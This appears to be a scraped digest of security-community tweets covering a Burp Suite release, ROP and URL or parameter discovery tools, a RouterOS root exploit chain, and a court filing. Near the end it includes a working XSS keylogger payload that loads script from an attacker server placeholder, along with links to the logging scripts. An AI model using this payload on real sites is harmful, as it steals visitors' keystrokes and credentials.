Burp Suite Pro 2.1.05 released, with experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities. Feedback welcome if you want to play now.
https://t.co/UPYjGMibnE
https://t.co/UPYjGMibnE
releases.portswigger.net
Professional 2.1.05
This release adds experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new appr...
rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. https://t.co/actBdnkcxQ
GitHub
GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.
rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries. - GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
https://t.co/34znlumYwM
Quick script that I use religiously for content discovery.
https://t.co/34znlumYwM
Quick script that I use religiously for content discovery.
GitHub
lc/hacks
Repo of useful scripts. Contribute to lc/hacks development by creating an account on GitHub.
So this filing in security research company CorelliumHQ vs Apple has some pretty interesting details. And it doesn't exactly look good for Apple. https://t.co/KNl2z3Uk8l
Google Docs
unredacted_Corellium_vs_Apple.pdf
RouterOS : Chain to Root - DNS Request to a Root Busybox Shell : https://t.co/eDqnIDHKdV
Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)
PoC : https://t.co/IsCXSysp8j
Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)
PoC : https://t.co/IsCXSysp8j
Medium
RouterOS: Chain to Root
DNS Request to a Root Busybox Shell
Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : https://t.co/L14G2peGuW
GitHub
s0md3v/Arjun
HTTP parameter discovery suite. Contribute to s0md3v/Arjun development by creating an account on GitHub.
Target has an android app?
1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
GitHub
s0md3v/Diggy
Extract endpoints from apk files. Contribute to s0md3v/Diggy development by creating an account on GitHub.
Remote XSS Keylogger:
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://t.co/PwIvyt9Uss
keylogger.js: https://t.co/g5HoTeA5z2
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://t.co/PwIvyt9Uss
keylogger.js: https://t.co/g5HoTeA5z2
Pastebin
[PHP] <?php if (!empty($_GET['c'])) { $f = fopen("log.txt", "a+"); fwrite($ - Pastebin.com